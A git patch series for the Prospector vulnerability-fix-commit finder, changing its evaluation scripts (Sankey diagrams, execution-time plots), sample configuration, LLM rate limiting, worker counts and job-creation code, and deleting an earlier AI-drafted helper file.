[ + "high", + "medium", + "low", + "not_found", + "not_reported", + "false_positive", + "aborted", + "missing", + ] + # Extract results from all three files + results1 = summary1["summary_execution_details"][-1]["results"] + results2 = summary2["summary_execution_details"][-1]["results"] + results3 = summary3["summary_execution_details"][-1]["results"] + + # Filter results to include only specified categories + results1 = {k: v for k, v in results1.items() if k in categories_to_include} + results2 = {k: v for k, v in results2.items() if k in categories_to_include} + results3 = {k: v for k, v in results3.items() if k in categories_to_include} + + # Create a mapping of CVEs to their categories for all three files + cve_categories1 = { + cve: category for category, cves in results1.items() for cve in cves + } + cve_categories2 = { + cve: category for category, cves in results2.items() for cve in cves + } + cve_categories3 = { + cve: category for category, cves in results3.items() for cve in cves + } + + # Get all unique CVEs and categories + all_cves = set(cve_categories1.keys()) | set(cve_categories2.keys()) | set(cve_categories3.keys()) + + # Create node labels + node_labels = categories_to_include * 3 + + # Create source, target, and value lists for Sankey diagram + source = [] + target = [] + value = [] + link_colors = [] + + # Count movements between categories + movements = defaultdict(int) + for cve in all_cves: + cat1 = cve_categories1.get(cve, None) + cat2 = cve_categories2.get(cve, None) + cat3 = cve_categories3.get(cve, None) + if cat1 and cat2: + movements[(cat1, cat2)] += 1 + if cat2 and cat3: + movements[(cat2, cat3)] += 1 + + # Convert movements to source, target, value, and color lists + category_to_index = {cat: i for i, cat in enumerate(categories_to_include)} + for (cat1, cat2), count in movements.items(): + source.append(category_to_index[cat1]) + target.append(category_to_index[cat2] + len(categories_to_include)) + value.append(count) + link_colors.append(category_colors[cat1]) + if cat2 in category_to_index: + source.append(category_to_index[cat2] + len(categories_to_include)) + target.append(category_to_index[cat2] + 2 * len(categories_to_include)) + value.append(count) + link_colors.append(category_colors[cat2]) + + # Create node colors + node_colors = [category_colors[cat] for cat in categories_to_include] * 3 + + # Create the Sankey diagram + fig = go.Figure( + data=[ + go.Sankey( + node=dict( + pad=15, + thickness=20, + line=dict(color="black", width=0.5), + label=node_labels, + color=node_colors, + ), + link=dict(source=source, target=target, value=value, color=link_colors), + ) + ] + ) + + filename1 = PROSPECTOR_REPORTS_PATH_HOST.split("/")[-2] + filename2 = COMPARISON_DIRECTORY.split("/")[-2] + filename3 = THIRD_DIRECTORY.split("/")[-2] + + fig.update_layout( + title_text=f"CVE Category Changes between {filename1}, {filename2}, and {filename3}", + font_size=10, + width=1200, + height=800, + ) + + # Save as PNG + write_image(fig, output_file) + print(f"Sankey diagram saved to {output_file}") +``` + +The main changes to the function are: + +1. We added a third JSON file (`summary_execution_file3`) and its corresponding `summary3` variable. + +2. We included the third file in the comparison and extracted its results. + +3. We updated the `all_cves` set to include CVEs from all three files. + +4. We modified the `movements` dictionary to count movements between categories from file1 to file2 and from file2 to file3. + +5. When converting movements to source, target, value, and color lists, we added an additional level for movements from file2 to file3. + +6. We updated the title of the Sankey diagram to include all three filenames. + +Now, when you run this modified function with the third JSON file, it will generate a Sankey diagram with three levels, showing the CVE category changes between the three files. + +Note: Make sure to update the `THIRD_DIRECTORY` variable to point to the correct directory containing the third JSON file. \ No newline at end of file diff --git a/prospector/evaluation/analyse.py b/prospector/evaluation/analyse.py index 031aa5271..ff0d026be 100644 --- a/prospector/evaluation/analyse.py +++ b/prospector/evaluation/analyse.py @@ -23,6 +23,7 @@ # The number of top commits to consider for 'high confidence' classification NUM_TOP_COMMITS = 5 +# NUM_TOP_COMMITS = 10 if BATCH in ["regular", "old_code"]: STRONG_RULES = [ @@ -143,11 +144,12 @@ def analyse_prospector_reports(filename: str, selected_cves: str): # Append aborted reports to results object results["aborted"] = reports_not_found - update_summary_execution_table( - results=results, - total=analysed_reports_count, - filepath=f"{ANALYSIS_RESULTS_PATH}summary_execution/table.tex", - ) + if BATCH == "regular": + update_summary_execution_table( + results=results, + total=analysed_reports_count, + filepath=f"{ANALYSIS_RESULTS_PATH}summary_execution/table.tex", + ) logger.info(f"Ran analysis on {PROSPECTOR_REPORTS_PATH_HOST}.") logger.info( @@ -222,6 +224,7 @@ def _analyse_report( return if i <= NUM_TOP_COMMITS and candidates_in_fixing_commits: + # if i <= 0 and candidates_in_fixing_commits: # check for weak rules weak_matched_rules = set(matched_rules).intersection(WEAK_RULES) if weak_matched_rules: @@ -407,13 +410,28 @@ def _process_cve_transitions(results1, results2): report2 = load_json_file( f"{COMPARISON_DIRECTORY}/{cve}.json" ) + # is the first commit different? + if ( + len(report1["commits"]) > 0 + and len(report2["commits"]) > 0 + ): + first_commit_same = ( + report1["commits"][0]["commit_id"] + == report2["commits"][0]["commit_id"] + ) + cve_info = { + "different first commit": not first_commit_same + } + else: + cve_info = {"different first commit": False} different_refs = _compare_references( report1["advisory_record"]["references"], report2["advisory_record"]["references"], ) - cve_info = {"different references": different_refs} + # cve_info = {"different references": different_refs} + cve_info["different references"] = different_refs # If references are the same, check commits if not different_refs: @@ -619,26 +637,26 @@ def _calculate_total_relevance(commit): return sum(rule["relevance"] for rule in commit["matched_rules"]) -def generate_sankey_diagram(): +def generate_sankey_diagram(file1: str, file2: str, file3: str): # Load JSON data - summary_execution_file = ( - ANALYSIS_RESULTS_PATH - + "summary_execution/" - + PROSPECTOR_REPORTS_PATH_HOST.split("/")[-2] - + ".json" + summary_execution_file_1 = ( + ANALYSIS_RESULTS_PATH + "summary_execution/" + file1 + ".json" ) - summary_execution_comparison_file = ( - ANALYSIS_RESULTS_PATH - + "summary_execution/" - + COMPARISON_DIRECTORY.split("/")[-2] - + ".json" + summary_execution_file_2 = ( + ANALYSIS_RESULTS_PATH + "summary_execution/" + file2 + ".json" + ) + summary_execution_file_3 = ( + ANALYSIS_RESULTS_PATH + "summary_execution/" + file3 + ".json" ) - summary1 = load_json_file(summary_execution_file) - summary2 = load_json_file(summary_execution_comparison_file) + summary1 = load_json_file(summary_execution_file_1) + summary2 = load_json_file(summary_execution_file_2) + summary3 = load_json_file(summary_execution_file_3) + print( - f"Comparing {summary_execution_file} with {summary_execution_comparison_file}" + f"Comparing {summary_execution_file_1}, {summary_execution_file_2}, and {summary_execution_file_3}" ) + # Ignore sub categories of "high" categories_to_include = [ "high", @@ -653,10 +671,12 @@ def generate_sankey_diagram(): # Extract results from both files results1 = summary1["summary_execution_details"][-1]["results"] results2 = summary2["summary_execution_details"][-1]["results"] + results3 = summary3["summary_execution_details"][-1]["results"] # Filter results to include only specified categories results1 = {k: v for k, v in results1.items() if k in categories_to_include} results2 = {k: v for k, v in results2.items() if k in categories_to_include} + results3 = {k: v for k, v in results3.items() if k in categories_to_include} # Create a mapping of CVEs to their categories for both files cve_categories1 = { @@ -665,12 +685,15 @@ def generate_sankey_diagram(): cve_categories2 = { cve: category for category, cves in results2.items() for cve in cves } + cve_categories3 = { + cve: category for category, cves in results3.items() for cve in cves + } # Get all unique CVEs and categories all_cves = set(cve_categories1.keys()) # Create node labels - node_labels = categories_to_include + categories_to_include + node_labels = categories_to_include * 3 # Create source, target, and value lists for Sankey diagram source = [] @@ -679,13 +702,17 @@ def generate_sankey_diagram(): link_colours = [] # Count movements between categories - movements = defaultdict(int) + movements12 = defaultdict(int) + movements23 = defaultdict(int) for cve in all_cves: cat1 = cve_categories1.get(cve, None) cat2 = cve_categories2.get(cve, None) - if not cat1 or not cat2: + cat3 = cve_categories3.get(cve, None) + if not cat1 or not cat2 or not cat3: + print(f"No category for {cve}") continue - movements[(cat1, cat2)] += 1 + movements12[(cat1, cat2)] += 1 + movements23[(cat2, cat3)] += 1 # Assign colors to categories category_colors = { @@ -700,10 +727,13 @@ def generate_sankey_diagram(): } # Create node colors - node_colors = [category_colors[cat] for cat in categories_to_include] * 2 + node_colors = [category_colors[cat] for cat in categories_to_include] * 3 + # Convert movements to source, target, and value lists category_to_index = {cat: i for i, cat in enumerate(categories_to_include)} - for (cat1, cat2), count in movements.items(): + + # First half, movements from file1 to file2 + for (cat1, cat2), count in movements12.items(): source.append(category_to_index[cat1]) target.append(category_to_index[cat2] + len(categories_to_include)) value.append(count) @@ -712,6 +742,16 @@ def generate_sankey_diagram(): else: link_colours.append(category_colors[cat1]) + # Second half: Movements from file2 to file3 + for (cat2, cat3), count in movements23.items(): + source.append(category_to_index[cat2] + len(categories_to_include)) + target.append(category_to_index[cat3] + 2 * len(categories_to_include)) + value.append(count) + if cat2 == cat3: + link_colours.append("lightgray") + else: + link_colours.append(category_colors[cat2]) + # Create the Sankey diagram fig = go.Figure( data=[ @@ -733,18 +773,15 @@ def generate_sankey_diagram(): ] ) - filename1 = PROSPECTOR_REPORTS_PATH_HOST.split("/")[-2] - filename2 = COMPARISON_DIRECTORY.split("/")[-2] - fig.update_layout( - title_text=f"CVE Category Changes between {filename1} and {filename2}", - font_size=10, + title_text=f"CVE Category Changes between {file1}, {file2}, and {file3}", + font_size=14, width=1200, height=800, ) output_file = ( - ANALYSIS_RESULTS_PATH + "plots/" + f"sankey-{filename1}-{filename2}.png" + ANALYSIS_RESULTS_PATH + "plots/" + f"sankey-{file1}-{file2}-{file3}.png" ) # Save as PNG write_image(fig, output_file) diff --git a/prospector/evaluation/config-sample.yaml b/prospector/evaluation/config-sample.yaml index b9e8c0afa..ae1b32d4c 100644 --- a/prospector/evaluation/config-sample.yaml +++ b/prospector/evaluation/config-sample.yaml @@ -4,40 +4,46 @@ debug_level: INFO # Input Data input_data_path: evaluation/data/input/ # datasets to run prospector on (CSV: ID;URL;VERSIONS;FLAG;COMMITS;COMMENTS) -# Prospector Reports -prospector_reports_path: evaluation/data/reports_without_llm/ +# directory to where the batches of reports are to be found +reports_directory: ../../../data/prospector_reports/ -# Analysis Results -analysis_results_path: evaluation/data/results/ +# Prospector Batch Selection +version_interval: true +llm_support: true +batch: regular # regular, old_code, old_reports -# Report Comparison directories -compare_directory1: evaluation/data/matteo_reports/d63/ -compare_directory2: evaluation/data/reports_without_llm_mvi/d63_correct_us/ +# compare reports selected above to +compare_directory: ../../../data/prospector_reports/nvi_with_llm/ -# Prospector settings (from Prospector config.yaml) +# Prospector settings (from the Prospector config.yaml) prospector_settings: - use_backend: always + # Maximum number of commits to process + max_candidates: 2000 - backend: http://backend:8000 + # Whether to use a backend or not: "always", "never", "optional" + use_backend: never + + # backend: http://backend:8000 + backend: http://localhost:8000 database: user: postgres password: example - host: db + host: db # Database address; when in containerised version, use 'db', otherwise 'localhost' port: 5432 dbname: postgres redis_url: redis://localhost:6379/0 - # LLM Usage + # LLM Usage (check README for help) llm_service: - type: sap - model_name: gpt-4 - temperature: 0.0 + type: sap # sap or third_party + model_name: gpt-4 # gpt-4 or mistral-large-latest + temperature: 0.0 # optional, default is 0.0 ai_core_sk: sk.json - # LLM support options - use_llm_repository_url: True + # LLM support options (check README for help) + use_llm_repository_url: True # True in order to instantiate the Singleton, but the URL will be passed in the evaluation enabled_rules: # Phase 1 Rules @@ -58,4 +64,6 @@ prospector_settings: - BUG_IN_MESSAGE - COMMIT_HAS_TWINS # Phase 2 Rules (llm_service required!): - # - COMMIT_IS_SECURITY_RELEVANT + - COMMIT_IS_SECURITY_RELEVANT + + git_cache: /tmp/gitcache # When running Prospector containerised \ No newline at end of file diff --git a/prospector/evaluation/main.py b/prospector/evaluation/main.py index 481b45d53..af93b28b6 100644 --- a/prospector/evaluation/main.py +++ b/prospector/evaluation/main.py @@ -116,10 +116,10 @@ def main(argv): elif args.analyze and not args.execute: # analysis of execution statistics in report if args.stats: - # analyse_statistics(args.input) + analyse_statistics(args.input) # overall_execution_time(args.input) # commit_classification_time(args.input) - candidates_execution_time(args.input) + # candidates_execution_time(args.input) elif args.flow: analyse_category_flows() @@ -141,9 +141,14 @@ def main(argv): elif not args.analyze and not args.execute and args.temporary: # difference_ground_truth_datasets() - # generate_sankey_diagram() + # generate_sankey_diagram("mvi_old_reports", "mvi_old_code", "mvi_without_llm") + generate_sankey_diagram( + "mvi_old_reports", + "mvi_old_reports(new_categories)", + "mvi_without_llm", + ) # candidates_execution_time(args.input) - overall_execution_time(args.input) + # overall_execution_time(args.input) # Cannot choose both analyse and execute, stop here. elif args.analyze and args.execute: diff --git a/prospector/evaluation/utils.py b/prospector/evaluation/utils.py index becdfe694..5e266e0c3 100644 --- a/prospector/evaluation/utils.py +++ b/prospector/evaluation/utils.py @@ -67,13 +67,9 @@ def update_summary_execution_table( table_data.append([v, round(v / total * 100, 2)]) # Choose which column to update: - if config.batch == "old_reports": + if config.version_interval: filepath = ANALYSIS_RESULTS_PATH + "summary_execution/mvi_table.tex" - col_indices = [1, 2] - - elif config.version_interval: - filepath = ANALYSIS_RESULTS_PATH + "summary_execution/mvi_table.tex" - col_indices = [3, 4] if not config.llm_support else [5, 6] + col_indices = [1, 2] if not config.llm_support else [3, 4] else: filepath = ANALYSIS_RESULTS_PATH + "summary_execution/nvi_table.tex" @@ -149,20 +145,20 @@ def select_reports_path_host( """Select where to store generated reports, or where to find reports for analysis.""" if version_interval and batch == "old_code": - return f"{config.reports_directory}mvi_old_code_reports/" + return f"{config.reports_directory}mvi_old_code/" if version_interval and batch == "old_reports": - return f"{config.reports_directory}matteo_reports/" + return f"{config.reports_directory}mvi_old_reports/" if version_interval and not llm_support: - return f"{config.reports_directory}mvi_without_llm_reports/" + return f"{config.reports_directory}mvi_without_llm/" if version_interval and llm_support: - return f"{config.reports_directory}mvi_with_llm_reports/" + return f"{config.reports_directory}mvi_with_llm/" if not version_interval and batch == "old_code": - return f"{config.reports_directory}nvi_old_code_reports/" + return f"{config.reports_directory}nvi_old_code/" if not version_interval and not llm_support: - return f"{config.reports_directory}nvi_without_llm_reports/" + return f"{config.reports_directory}nvi_without_llm/" if not version_interval and llm_support: - return f"{config.reports_directory}nvi_with_llm_reports/" + return f"{config.reports_directory}nvi_with_llm/" INPUT_DATA_PATH = config.input_data_path From 6c35088f14283be72b40bfde0ae9082dab2d0fb1 Mon Sep 17 00:00:00 2001 From: I748376 Date: Mon, 26 Aug 2024 15:21:59 +0000 Subject: [PATCH 118/130] [FIX] adjusts code so that with LLm support can run with 10 workers, and fixes bug where cc outcome would be taken from database regardless of the settings in config.yaml --- prospector/claude.md | 150 ---------------------------------- prospector/core/prospector.py | 12 +-- prospector/llm/llm_service.py | 3 + prospector/rules/rules.py | 7 -- prospector/util/http.py | 5 +- 5 files changed, 9 insertions(+), 168 deletions(-) delete mode 100644 prospector/claude.md diff --git a/prospector/claude.md b/prospector/claude.md deleted file mode 100644 index 7f92c7393..000000000 --- a/prospector/claude.md +++ /dev/null @@ -1,150 +0,0 @@ -Certainly! Here's the modified Python function that takes a third JSON file into consideration and creates a Sankey diagram with three levels: - -```python -def generate_sankey_diagram(output_file="sankey_diagram.png"): - # Load JSON data - summary_execution_file1 = ( - ANALYSIS_RESULTS_PATH - + "summary_execution/" - + PROSPECTOR_REPORTS_PATH_HOST.split("/")[-2] - + ".json" - ) - summary_execution_file2 = ( - ANALYSIS_RESULTS_PATH - + "summary_execution/" - + COMPARISON_DIRECTORY.split("/")[-2] - + ".json" - ) - summary_execution_file3 = ( - ANALYSIS_RESULTS_PATH - + "summary_execution/" - + THIRD_DIRECTORY.split("/")[-2] - + ".json" - ) - - summary1 = load_json_file(summary_execution_file1) - summary2 = load_json_file(summary_execution_file2) - summary3 = load_json_file(summary_execution_file3) - print( - f"Comparing {summary_execution_file1}, {summary_execution_file2}, and {summary_execution_file3}" - ) - # Ignore sub categories of "high" - categories_to_include = [ - "high", - "medium", - "low", - "not_found", - "not_reported", - "false_positive", - "aborted", - "missing", - ] - # Extract results from all three files - results1 = summary1["summary_execution_details"][-1]["results"] - results2 = summary2["summary_execution_details"][-1]["results"] - results3 = summary3["summary_execution_details"][-1]["results"] - - # Filter results to include only specified categories - results1 = {k: v for k, v in results1.items() if k in categories_to_include} - results2 = {k: v for k, v in results2.items() if k in categories_to_include} - results3 = {k: v for k, v in results3.items() if k in categories_to_include} - - # Create a mapping of CVEs to their categories for all three files - cve_categories1 = { - cve: category for category, cves in results1.items() for cve in cves - } - cve_categories2 = { - cve: category for category, cves in results2.items() for cve in cves - } - cve_categories3 = { - cve: category for category, cves in results3.items() for cve in cves - } - - # Get all unique CVEs and categories - all_cves = set(cve_categories1.keys()) | set(cve_categories2.keys()) | set(cve_categories3.keys()) - - # Create node labels - node_labels = categories_to_include * 3 - - # Create source, target, and value lists for Sankey diagram - source = [] - target = [] - value = [] - link_colors = [] - - # Count movements between categories - movements = defaultdict(int) - for cve in all_cves: - cat1 = cve_categories1.get(cve, None) - cat2 = cve_categories2.get(cve, None) - cat3 = cve_categories3.get(cve, None) - if cat1 and cat2: - movements[(cat1, cat2)] += 1 - if cat2 and cat3: - movements[(cat2, cat3)] += 1 - - # Convert movements to source, target, value, and color lists - category_to_index = {cat: i for i, cat in enumerate(categories_to_include)} - for (cat1, cat2), count in movements.items(): - source.append(category_to_index[cat1]) - target.append(category_to_index[cat2] + len(categories_to_include)) - value.append(count) - link_colors.append(category_colors[cat1]) - if cat2 in category_to_index: - source.append(category_to_index[cat2] + len(categories_to_include)) - target.append(category_to_index[cat2] + 2 * len(categories_to_include)) - value.append(count) - link_colors.append(category_colors[cat2]) - - # Create node colors - node_colors = [category_colors[cat] for cat in categories_to_include] * 3 - - # Create the Sankey diagram - fig = go.Figure( - data=[ - go.Sankey( - node=dict( - pad=15, - thickness=20, - line=dict(color="black", width=0.5), - label=node_labels, - color=node_colors, - ), - link=dict(source=source, target=target, value=value, color=link_colors), - ) - ] - ) - - filename1 = PROSPECTOR_REPORTS_PATH_HOST.split("/")[-2] - filename2 = COMPARISON_DIRECTORY.split("/")[-2] - filename3 = THIRD_DIRECTORY.split("/")[-2] - - fig.update_layout( - title_text=f"CVE Category Changes between {filename1}, {filename2}, and {filename3}", - font_size=10, - width=1200, - height=800, - ) - - # Save as PNG - write_image(fig, output_file) - print(f"Sankey diagram saved to {output_file}") -``` - -The main changes to the function are: - -1. We added a third JSON file (`summary_execution_file3`) and its corresponding `summary3` variable. - -2. We included the third file in the comparison and extracted its results. - -3. We updated the `all_cves` set to include CVEs from all three files. - -4. We modified the `movements` dictionary to count movements between categories from file1 to file2 and from file2 to file3. - -5. When converting movements to source, target, value, and color lists, we added an additional level for movements from file2 to file3. - -6. We updated the title of the Sankey diagram to include all three filenames. - -Now, when you run this modified function with the third JSON file, it will generate a Sankey diagram with three levels, showing the CVE category changes between the three files. - -Note: Make sure to update the `THIRD_DIRECTORY` variable to point to the correct directory containing the third JSON file. \ No newline at end of file diff --git a/prospector/core/prospector.py b/prospector/core/prospector.py index 89c21db02..dfab128b5 100644 --- a/prospector/core/prospector.py +++ b/prospector/core/prospector.py @@ -1,6 +1,5 @@ # flake8: noqa -from datetime import datetime, timezone import logging import os import sys @@ -119,9 +118,12 @@ def prospector( # noqa: C901 ) # print(advisory_record.references) # obtain a repository object - repository = Git(repository_url, cache_path=git_cache) + repository = Git(repository_url, git_cache) with ConsoleWriter("Git repository cloning") as console: + logger.debug( + f"Downloading repository {repository.url} in {repository.path}" + ) repository.clone() tags = repository.get_tags() @@ -138,9 +140,6 @@ def prospector( # noqa: C901 if len(candidates) > 0 and any( [c for c in candidates if c in commits_in_advisory_references] ): - logger.info( - f"Found commits referenced in advisory:{commits_in_advisory_references}." - ) console.print("Fixing commit found in the advisory references\n") advisory_record.has_fixing_commit = True @@ -516,9 +515,6 @@ def get_commits_from_tags( ) if len(candidates) == 0: - logger.info( - f"No commands found with tags, defaulting to commits within 60 days of advisory reserved date: {datetime.fromtimestamp(advisory_record.reserved_timestamp, tz=timezone.utc)}" - ) candidates = repository.create_commits( since=advisory_record.reserved_timestamp - time_limit_before, diff --git a/prospector/llm/llm_service.py b/prospector/llm/llm_service.py index e31726393..af16b858b 100644 --- a/prospector/llm/llm_service.py +++ b/prospector/llm/llm_service.py @@ -1,5 +1,6 @@ import itertools import re +import time import validators from langchain_core.language_models.llms import LLM @@ -118,6 +119,8 @@ def classify_commit( ) logger.info(f"LLM returned is_relevant={is_relevant}") + time.sleep(1) + except HTTPError as e: # if the diff is too big, a 400 error is returned -> silently ignore by returning False for this commit status_code = e.response.status_code diff --git a/prospector/rules/rules.py b/prospector/rules/rules.py index 0793b47ee..cdc1d8d64 100644 --- a/prospector/rules/rules.py +++ b/prospector/rules/rules.py @@ -461,13 +461,6 @@ def apply( candidate.diff, candidate.repository, candidate.message ) - update_response = requests.post( - backend_address + "/commits/", - json=[candidate.to_dict()], - headers={"content-type": "application/json"}, - ) - update_response.raise_for_status() - return candidate.security_relevant except requests.exceptions.RequestException as e: diff --git a/prospector/util/http.py b/prospector/util/http.py index 48b93c80d..bb7305666 100644 --- a/prospector/util/http.py +++ b/prospector/util/http.py @@ -27,9 +27,8 @@ def fetch_url( """ try: - session = requests_cache.CachedSession( - "requests-cache", expire_after=604800 - ) + # session = requests_cache.CachedSession("requests-cache", expire_after=0) + session = requests.Session() if params is None: content = session.get(url).content else: From e0f16d8eb0868181448340256af20f1d411940da Mon Sep 17 00:00:00 2001 From: I748376 Date: Mon, 26 Aug 2024 15:22:30 +0000 Subject: [PATCH 119/130] [FIX] removes unused variables --- prospector/docker-compose.yml | 6 ------ 1 file changed, 6 deletions(-) diff --git a/prospector/docker-compose.yml b/prospector/docker-compose.yml index 7910bc861..211bcd58b 100644 --- a/prospector/docker-compose.yml +++ b/prospector/docker-compose.yml @@ -16,12 +16,6 @@ services: GIT_CACHE: /tmp/gitcache CVE_DATA_PATH: /app/cve_data REDIS_URL: redis://redis:6379/0 - #POSTGRES_HOST: db - #POSTGRES_PORT: 5432 - #POSTGRES_USER: postgres - #POSTGRES_PASSWORD: example - #POSTGRES_DBNAME: postgres - #NVD_API_KEY: ${NVD_API_KEY} worker: build: From 0ec20043177d0809e6be3a1be05d908d10aa2ae8 Mon Sep 17 00:00:00 2001 From: I748376 Date: Mon, 26 Aug 2024 15:23:24 +0000 Subject: [PATCH 120/130] [FIX] adjusts titles of plots, uses different paths (alltogether unimportant) --- .../etc_supervisor_confd_rqworker.conf.j2 | 2 +- prospector/evaluation/analyse_statistics.py | 21 +++++++++++-------- 2 files changed, 13 insertions(+), 10 deletions(-) diff --git a/prospector/docker/worker/etc_supervisor_confd_rqworker.conf.j2 b/prospector/docker/worker/etc_supervisor_confd_rqworker.conf.j2 index 7cb8b24e8..2bb199209 100644 --- a/prospector/docker/worker/etc_supervisor_confd_rqworker.conf.j2 +++ b/prospector/docker/worker/etc_supervisor_confd_rqworker.conf.j2 @@ -8,7 +8,7 @@ command=/usr/local/bin/python3 /usr/local/bin/rq worker {{env['RQ_QUEUE']}} -u r process_name=%(program_name)s%(process_num)01d ; If you want to run more than one worker instance, increase this -numprocs=20 +numprocs=10 redirect_stderr=true ; This is the directory from which RQ is ran. Be sure to point this to the diff --git a/prospector/evaluation/analyse_statistics.py b/prospector/evaluation/analyse_statistics.py index 4230b1bca..59e60dd71 100644 --- a/prospector/evaluation/analyse_statistics.py +++ b/prospector/evaluation/analyse_statistics.py @@ -36,7 +36,7 @@ def analyse_statistics(filename: str): # noqa: C901 # For each CSV in the input dataset, check its report for itm in dataset: # Each itm has ID;URL;VERSIONS;FLAG;COMMITS;COMMENTS - filepath = PROSPECTOR_REPORTS_PATH_HOST + filename + f"/{itm[0]}.json" + filepath = PROSPECTOR_REPORTS_PATH_HOST + f"{itm[0]}.json" try: repo_time, avg_cc_time, total_cc_time = _process_llm_statistics( filepath @@ -124,8 +124,11 @@ def _process_llm_statistics(filepath: str) -> Tuple[float, float, float]: llm_stats["commit_classification"]["execution time"] ) + # time_for_repo_url = llm_stats["repository_url"]["execution time"][0] + return ( - llm_stats["repository_url"]["execution time"][0], + # llm_stats["repository_url"]["execution time"][0], + 0, avg_cc_time, total_cc_time, ) @@ -159,10 +162,10 @@ def overall_execution_time(input_file: str): dataset = dataset[:100] directories = { - "without LLM NVI": "evaluation/data/reports_without_llm", - "with LLM NVI": "evaluation/data/reports_with_llm", - "without LLM MVI": "evaluation/data/reports_without_llm_mvi", - "with LLM MVI": "evaluation/data/reports_with_llm_mvi", + "without LLM NVI": "../../../data/new_db_prospector_reports/mvi_with_llm_reports", + "with LLM NVI": "../../../data/prospector_reports/nvi_with_llm_reports", + "without LLM MVI": "../../../data/prospector_reports/mvi_without_llm_reports", + "with LLM MVI": "../../../data/prospector_reports/mvi_with_llm_reports", } for batch, path in directories.items(): @@ -251,7 +254,7 @@ def commit_classification_time(input_file: str): plt.yscale("log") # Customize the plot - plt.title("Overall Execution Time Comparison (Log Scale)") + plt.title("Commit Classification Time Comparison") plt.xlabel("Report Set") plt.ylabel("Execution Time (s)") @@ -282,8 +285,8 @@ def candidates_execution_time(input_file: str): # dataset = dataset[:100] directories = { - "NVI": "evaluation/data/reports_without_llm_mvi", - # "MVI": "evaluation/data/reports_with_llm_mvi", + # "NVI": "evaluation/data/reports_without_llm_mvi", + "MVI": "../../../data/new_db_prospector_reports/mvi_with_llm_reports", } for batch, path in directories.items(): From 95f7111c7fa319859f72b0b2e58353b37c5c1c43 Mon Sep 17 00:00:00 2001 From: I748376 Date: Tue, 27 Aug 2024 13:48:50 +0000 Subject: [PATCH 121/130] [IMP] improves the execution time analysis plots by adding a violin plot and showing the boxplots on a logarithmic scale --- prospector/evaluation/analyse_statistics.py | 72 +++++++++++++++++---- 1 file changed, 58 insertions(+), 14 deletions(-) diff --git a/prospector/evaluation/analyse_statistics.py b/prospector/evaluation/analyse_statistics.py index 59e60dd71..ab8181c4f 100644 --- a/prospector/evaluation/analyse_statistics.py +++ b/prospector/evaluation/analyse_statistics.py @@ -153,21 +153,17 @@ def _get_cc_num_commits(filepath): def overall_execution_time(input_file: str): - """Create a boxplot to compare the overall execution time across four + """Create a violin plot with separate box plots to compare the overall execution time across three categories of reports.""" data = [] - file = f"{INPUT_DATA_PATH}{input_file}.csv" dataset = load_dataset(file) - dataset = dataset[:100] - + dataset = dataset[:100] # Consider using the full dataset if possible directories = { - "without LLM NVI": "../../../data/new_db_prospector_reports/mvi_with_llm_reports", - "with LLM NVI": "../../../data/prospector_reports/nvi_with_llm_reports", - "without LLM MVI": "../../../data/prospector_reports/mvi_without_llm_reports", - "with LLM MVI": "../../../data/prospector_reports/mvi_with_llm_reports", + "No Database": "../../../data/no_db_prospector_reports/mvi_with_llm", + "New Database": "../../../data/new_db_prospector_reports/mvi_with_llm", + "Prepared Database": "../../../data/prospector_reports/mvi_with_llm", } - for batch, path in directories.items(): for record in dataset: try: @@ -187,12 +183,60 @@ def overall_execution_time(input_file: str): df = pd.DataFrame(data) - sns.boxplot(x="set", y="core_execution_time", data=df) - plt.title("Overall Execution Time Comparison") - plt.xlabel("Report Set") - plt.ylabel("Execution Time (s)") + # Create a figure with two subplots + fig, (ax1, ax2, ax3) = plt.subplots( + 3, 1, figsize=(12, 15), height_ratios=[2, 1, 1] + ) + fig.suptitle("Overall Execution Time Comparison", fontsize=16) + + # Violin plot with swarm plot + sns.violinplot( + x="set", + y="core_execution_time", + data=df, + ax=ax1, + cut=0, + scale="width", + width=0.8, + ) + sns.swarmplot( + x="set", y="core_execution_time", data=df, color=".25", size=3, ax=ax1 + ) + ax1.set_yscale("log") + ax1.set_ylabel("Execution Time (s) - Log Scale") + + # Box plot + sns.boxplot(x="set", y="core_execution_time", data=df, ax=ax2, width=0.6) + ax2.set_yscale("log") + ax2.set_ylabel("Execution Time (s) - Log Scale") + + # Plot focusing on lower range (up to 95th percentile) + percentile_95 = df["core_execution_time"].quantile(0.95) + df_lower = df[df["core_execution_time"] <= percentile_95] + sns.boxplot( + x="set", y="core_execution_time", data=df_lower, ax=ax3, width=0.6 + ) + ax3.set_ylabel("Execution Time (s) - 95th Percentile") + + for ax in [ax1, ax2, ax3]: + ax.set_xlabel("Report Set") + + plt.tight_layout() + plt.savefig(f"{ANALYSIS_RESULTS_PATH}plots/execution_time_analysis.png") + plt.close() - plt.savefig(f"{ANALYSIS_RESULTS_PATH}plots/boxplot-execution-time.png") + # Print summary statistics + print(df.groupby("set")["core_execution_time"].describe()) + + # Additional analysis: print median and interquartile range + for batch in df["set"].unique(): + batch_data = df[df["set"] == batch]["core_execution_time"] + median = batch_data.median() + q1, q3 = batch_data.quantile([0.25, 0.75]) + iqr = q3 - q1 + print(f"\n{batch}:") + print(f"Median: {median:.2f}") + print(f"Interquartile Range: {iqr:.2f}") def commit_classification_time(input_file: str): From 7c6bfd516d493cf60367049e12edc5c5514273c7 Mon Sep 17 00:00:00 2001 From: I748376 Date: Wed, 28 Aug 2024 13:02:34 +0000 Subject: [PATCH 122/130] [ADD] copies code for using the API to create jobs --- prospector/data_sources/nvd/job_creation.py | 145 ++++++++++++++++++ prospector/evaluation/create_jobs.py | 160 ++++++++++++++++++++ prospector/evaluation/main.py | 13 +- 3 files changed, 314 insertions(+), 4 deletions(-) create mode 100644 prospector/data_sources/nvd/job_creation.py create mode 100644 prospector/evaluation/create_jobs.py diff --git a/prospector/data_sources/nvd/job_creation.py b/prospector/data_sources/nvd/job_creation.py new file mode 100644 index 000000000..f586e5230 --- /dev/null +++ b/prospector/data_sources/nvd/job_creation.py @@ -0,0 +1,145 @@ +import json +import sys +import time +from datetime import datetime + +import redis +import requests +from rq import Connection, Queue, get_current_job + +from backenddb.postgres import PostgresBackendDB +from core.prospector import prospector +from core.report import generate_report +from log.logger import logger +from util.config_parser import parse_config_file + +# get the redis server url and backend from configuration file +config = parse_config_file() +# redis_url = config.redis_url +# backend = config.backend +redis_url = "redis://localhost:6379/0" +backend = "http://backend:8000" + + +def run_prospector(vuln_id, repo_url, v_int): + job = get_current_job() + job_id = job.get_id() + url = f"{backend}/jobs/{job_id}" + data = { + "status": job.get_status(), + "started_at": job.started_at.isoformat(), + } + + try: + response = requests.put(url, json=data) + if response.status_code == 200: + response_object = response.json() + print(response_object) + else: + print("Error:", response.status_code) + except requests.exceptions.RequestException as e: + print("Error:", e) + + 